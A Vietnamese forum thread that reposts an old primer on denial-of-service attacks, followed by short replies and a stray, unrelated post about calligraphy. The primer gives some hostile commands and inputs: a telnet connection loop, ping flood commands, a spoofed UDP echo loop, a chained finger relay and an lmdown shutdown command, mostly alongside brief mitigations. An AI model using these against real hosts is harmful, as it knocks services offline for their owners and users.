Đây là dạng tấn công 2 hệ thống đích và có thể sử dụng để ngừng các dịch vụ của 2 hệ thống. Cả 2 hệ thống được kết nối tới nhau, một tạo ra một chuỗi các kí tự cho mỗi gói nhận, theo cách nói khác là tạo ra các kí tự yêu cầu UDP trong khi đó hệ thống còn lại sẽ phản xạ lại mọi thông điệp mà nó nhận được. Do vậy tạo nên một vòng lặp vô hạn giữa 2 hệ thống, mọi dịch vụ khác giữa chúng bị tê liệt.

Ping of death
Kiểu tấn công này sẽ không làm việc được đối với các máy chủ đã được thiết lập để phòng ngừa nó. Trong kiểu tấn công này hệ thống đích được thăm dò bởi một gói vượt quá kích thước bình thường cho phép bởi giao thức tcp/ip và sẽ làm cho hệ thống đích bị treo hoặc khởi động lại

Tear Drop
Khi dữ liệu được gửi từ một hệ thống tới hệ thống khác nó được chia ra thành những mảnh nhỏ hơn và được máy đích tập hợp lại. Các gói này có một trường offset trong phần đầu của gói TCP là phần qui định phần dữ liệu nào được gửi đi. Nó kết hợp với số chuỗi, giúp cho máy đích có thể tập hợp các gói lại.

Trong phương thức tear drop các gói được chuyển đi với trường offfset chồng chéo, khiến cho máy nhận không thể ráp chúng lại và dẫn tới bị phá vỡ.

DDOS

Có một kiểu tấn công mới gọi là DDOS trong đó nhiều máy tính được sử dụng để tấn công từ chối dịch vụ.
============================
Còn một bài nữa nà :
========================
A. GIỚI THIỆU CHUNG

.A.1. DoS attack là gì?
DoS là làm cho các service bị tê liệt, ko còn đáp ứng được các request nữa. Loại attack này rất dễ thực hiện và lại rất khó bảo vệ hệ thống khỏi các DoS attack. vấn đề là Unix cho rằng hệ thống của users sẽ vẫn chạy được

.A.2. Có Hệ điều hành nào an toàn hơn ko?
Câu trả lời là ko. Tính an toàn của hệ thống phụ thụôc vào administrator.
Hệ thống Unix phức tạp hơn và có nhiều build-in prog cũng như services. điều này cũng mở ra nhiều cách để crash the system từ bên trong hơn win NT & 95 network.
Uniz có nhiều tools & prog để tìm ra các attack và giám sát users. Trong khi wind lại rất khó làm được.
Một unix admin trung bình thì cũng có nhiều kinh ngiệm hơn là microsoft admin.
Tóm lại unix an toàn hơn đối với DoS attack từ bên trong. Tuy nhiên microsoft lại có tính secure cao hơn đối với các attack từ bên ngoài chỉ vì nó có ít service hơn.


.B. ĐIỂM CƠ BẢN CHO 1 ATTACK

.B.1. SWAP SPACE
hầu hết các system đều có vài trăm MB swap space để phục vụ client requests. Swap space thuờng dùng cho các process con có thời gian ngắn nên DoS có thể được dựa trên phương thức làm tràn đầy swap space.

.B.2. BANDWIDTH
nếu bandwith quá cao, network sẽ trở nên vô dụng. Do đó hầu hết Dos att tác động lên bandwith bằng nhiều cách.

.B.3. KERNEL TABLES
làm tràn kernel tables có thể gây ra các vấn đề nghiêm trọng trên hệ thống đặc biệt là các h thống write caches và small write buffers.
Kernel memory allocation cũng là tiêu điểm nhạy cảm. kernel có giới hạn kernelmap, nên nếu system đạt đến giới hạn này nó ko thể định vị thêm kernel memory và fải reboot. Kernel memory ko chỉ use cho RAM, CPUs, Screen ... mà nó còn use cho các process thông thường. Nghĩa là bất cứ ht nào cũng có thể crashed nhanh chóng dễ dàng với những giải thuật nhỏ.
đối với solaris 2x lệnh sar có thể đo lường và bào cáo về kernel memory đang dùng. nhưng sunOS 4x thì ko có lệnh sar. nếu bạn use Solaris, use lệnh sar –k 1 để lấy thông tin, lệnh netstat –k cũng cò thể dùng để xem kermel memory đã chiếm bao nhiêu trong subpaging.

.B.4. RAM
Dos attack chiếm 1 khoảng lớn của RAM cũng có thể gây ra các vấn đề lớn. NFS và mailserver là dễ bị attack nhất vì chúng ko cần nhiều RAM. 1 NFS client thường sẽ tạo ra rất nhiều catching, nhưng 1 NFS client cũng có thể là anything trong prog mà bạn có thể tự viết lấy.

.B.5. DISKS
1 cách attack cổ điển là làm đầy harddisk. HD có thể bị overloaded và ko thể use bằng nhiều cách.

.B.6. CACHES
DoS attack liên quan đến caches được dựa trên phương pháp làm tắc nghẽn or ngăn ngừa cache.
Trong solaris 2x:
Directory name lookup cache: liên hệ tên file với vnode.
Inode cache: thông tin cache đọc từ đĩa trong trường hợp cần đọc lại.
Rnode cache: giữ thông tin về ht file NFS.
Buffer cache: cache Inode làm tắc nghẽn gián tiếp I/O của đĩa thực.

.B.7. INETD
1 khi inetd bị crashed, tất cả các service khác đi qua inetd sẽ ko còn làm việc được nữa.

.C. ATTACK TỪ BÊN NGOÀI.

.C.1. Sự thuận lợi của Finger
hầu hết các prog finger đều hỗ trợ chuyển tiếp đến host khác. Vd: $finger @system.two.com@system.one.com finger đi qua system.one.com và system.two.com. do đó two sẽ tưởng là one finger mình. pp này dùng để che dấu cũng như cho các very dirty DoS attack. Hãy xem vd sau: $finger @@@@@@@@@@@@@@@@@@@@@@host.we.attack tất cả các @ sẽ nhận finger để finger host.we.attack rất nhiều lần làm host này bị ảnh hưởng rất lớn.
biện pháp là cài đặt finger ko hỗ trợ chuyển tiếp như GNU finger, or bạn cũng có thể tắt finger service.

.C.2. UDP AND SUNOS 4.1.3.
sunOS 4.1.3 bị lỗi boot nếu bạn gởi tới 1 packet với thông tin sai trong header. Đây là nguyên nhân nếu như ip-options biểu diễn sai kích cỡ của packet.
biện pháp: cài đặt patch đúng.

.C.3. Làm tê liệt X-WINDOWS
nếu host cho phép telnet tới X-Windows port (thường là từ 6000 đến 6025), bạn có thể làm tê liệt cả ht x-windows bằng cách tạo ra hàng loạt kết nối telnet or prog gởi hàng loạt XopenDisplay() đến port đó. điều này cũng có thể áp dụng cho Motif or Open windows.
biện pháp: đóng kết nối tới x-windows port.

.C.4. Cố ý sử dụng UDP SERVICES
rất dễ use UDP services (như echo, time, datetime, chargen) lặp lại 1 cách liên tục nhờ các IP-spoofing thông thường. Vd:
from-IP=127.0.0.1
to-IP=system.we.attack
packet type:UDP
from UDP port 7
to UDP port 7
header yêu cầu là packet đến từ 127.0.0.1 (lặp lại liên tục) và tiêu điểm là echo port tại system.we.attack. đến khi system.we.attack biết là 127.0.0.1 system.we.attack và vòng lặp được thiết lập. chú ý là system.we.attack trông giồng như DNS-name nhưng tiêu điểm luôn luôn là 1 IP number.

.C.5. ATTACKING WITH LYNX CLIENTS
www server sẽ tách httpd process thành phản hồi cho các request từ client. Process chỉ kéo dài khoảng 1 giây và vì thế load sẽ ko thực hiện được nếu bạn use ps. DoS atack use hàng loạt w3 client (lynx client) là rất an toàn nhưng nên nhớ là lệnh netstat cũng có thể phát hiện ra attack.
Httpd:s (như http-gw)

.C.6. Telnet
use thử script này:
while : ; do
telnet system.we.attack &
done
atack kiểu này cũng tốn 1 ít bandwith, nhưng nó chẳng là gì so với pp finger or các pp khác. Nhưng 1 số firewalls & httpd:s lại nghĩ đây là vòng lặp và tự động tắt chúng, cho đến khi admin gởi lệnh kill - HUP

.C.7. use telnet trong SOLARIS 2.4
nều attacker tạo ra kết nối telnet tới solaris 2.4 host và thoát ra use:
control -}
quit
thì inetd sẽ tiếp tục mãi mãi (ít nhất là vài trăm lần)
biện pháp: cài đặt patch đúng.

.C.8. làm sao để DISABLE ACCOUNTS
1 vài ht disable accout sau n lần bad login or chờ n giây. bạn có thể use tíng năng này để lock out 1 user nào đó từ ht.

.C.9. LINUX AND TCP TIME, DAYTIME
inetd trong linux có thể bị crash nếu gởi nhiều SYN packet tới daytime (port 13) or time (port 37)

.C.10. attack bằng chuyển tiếp ICMP
gateways use chuyển tiếp ICMP để yêu cầu ht overide routing tables. để vô hiệu chuyển tiếp icmp, bạn fải biết kết nối hiện tại để gởi tới 1 route làm đứt kết nối or gởi tới host messages lỗi nều như kết nối đó ko use cryptation
vd: (gởi messages lỗi)
destination unreachable
time to live exceeded
parameter problem
packet too big
message này sẽ reset kết nối.

.C.11. BROADCAST STORMS
đây là pp thông dụng nhất trong mạng mà host hoạt động như các gateway. pp cơ bản là gởi nhiều packet tới tất cả các host với đích đến ko có thực. mỗi host sẽ cố gắng chuyển từng packet dẫn đến packet đó được chuyển lòng vòng trong 1 thời gian dài và nếu có packet mới được tiếp tục gởi tới mạng sẽ nhanh chóng gặp rắc rối.
loại attack này có thể là ping, finger, & sendmail. Nhưng hầu hết services có thể vô hiệu bằng vài cách khác.

.C.12. SYN FLOODING
syn packet được use trong 3-way handshake do đó syn flooding attack được dựa trên pp incomplete handshake. Attacker host gởi tới tấp các syn packet nhưng ko phản hồi lại các ACK packet.
bạn có thể xem thêm về syn flooding tại:
[.1.] http://www.eecs.nwu.edu/~jmyers/bugtraq/1354.html
Article by Christopher Klaus, including a "solution".

[.2.] http://jya.com/floodd.txt
2600, Summer, 1996, pp. 6-11. FLOOD WARNING by Jason Fairlane

[.3.] http://www.fc.net/phrack/files/p48/p48-14.html
IP-spoofing Demystified by daemon9 / route / infinity
for Phrack Magazine

.C.13. PING FLOODING
unix: ping –s host
windows 9x: ping –t –l 256 ***.***.***.***
ex: ping –l 65510 address.to.the.machine
nó có thể bị tê liệt or reboot.
* Kernel phiên bản từ 2.0.7 đến 2.0.20 or AIX4, OSF, HPUX10.1, DUXIX 4.0 -->> crashed
* OSF/1, 3.2C, solaris 2.4 x86 -->> reboot.

.C.14. FLEXlm
bất cứ host nào chạy FLEXlm có thể bị shutdown bằng lệnh:
#lmdown –c /etc/licence.dat
lmdown – copyright © 1989, 1991 highland software, inc.
shutting down FLEXlm on nodes: ***
are you sure? [y/n]: y
shut down the node ***
#.

=======================
The End
=======================
To Admin : Nếu có thành lập ddth attacker thì mita vào group đầu tiên nha

học FPT -Aptech a?bạn chắc cũng khá về CNTT lắm nhỉ?giúp đỡ nhé!thanks so much:d

[=========> Bổ sung bài viết <=========]


Xin loi truoc vi may toi bi truc trac nen khong danh tieng Viet duoc.

Toi khong phai la mot nguoi gioi lam ve tin hoc nhung cung xin gop y ve 2 bai viet DDos o tren:

1: Hai bai viet do rat chung chung, khong noi len duoc gi ca. Nhung bai viet kieu nhu vay day o trong cac sach ebook. Neu ban chiu kho doc ebook con chi tiet hon.

2: Toi khong biet kha nang cua nhung nguoi do la bao nhieu ma cung co nguoi de cu lam mod, chang le mod cua DDTH chi co vay thoi sao (chung chung qua).

Dieu cuoi cung (quan trong): Mac du la noi chung chung, nhung cac bai viet DDos tren cung khong phai tu nhung nguoi do viet, nhung bai viet do da xuat hien tu rat lau o tren trang hvaonline roi, cung chi la copy roi post lai thoi.

không thấy mấy bạn ý đau tay đôi với nhau đó à!!im lặng dùm nhé!để bọn tui học tập cái

[=========> Bổ sung bài viết <=========]


Dzô dziên ghê ta ơi, game gì ở đây :) hack hiếc cái gì

hê hê hê bùn kười quá

minh thi khong y kien vi khong hieu nhieu ve hacker nhung dang co y dinh lam do an ve DDos len tham khao nếu các bạn có tài liệu gì có thể hướng dẫn thi post lên cho minh nhé. Như Q khuyên là ko lên làm hacker theo minh thì có 1 câu nói "muốn làm IT Security thì phải làm hacker trước" (^_^)!! thanks all

@nhuquynh: hic2 bạn học đâu mà biết nhiều vậy??? thật là ngưỡng mộ mấy bạn!

bravo!!!!!!!!!!!!!!!!!!!!

coppy topic khac co hay hok ???

sax topic nay vào lãng quên rồi ah
hay thế mà :)

Hay quá, nhưng mình thắc mắc muốn có kiến thức tốt như bạn nhuquynh thi bắt đầu học từ đầu, và học cái gì?? Ai biết giai dap cho mình với.

thanks bài viết rất hữu ích ?

haizzz. Đào mộ. uh thì 20 ký tự

em tưởng bác share tool hoặc cách chống ddos

Toàn cao thủ không nha! Kết bạn NhuQuynh rồi đóa nha!

Sent from my Lenovo A390 using Tapatalk

Nếu chỉ đơn giản là viết chữ đẹp thì được. Chứ còn muốn nâng lên tầm nghệ thuật thì thư pháp Việt còn phải phấn đầu nhiều.
Có hai luồng ý kiến về thư pháp Việt, nếu chịu khó tìm hiểu thì thấy mấy ông chửi nhau ghê lắm.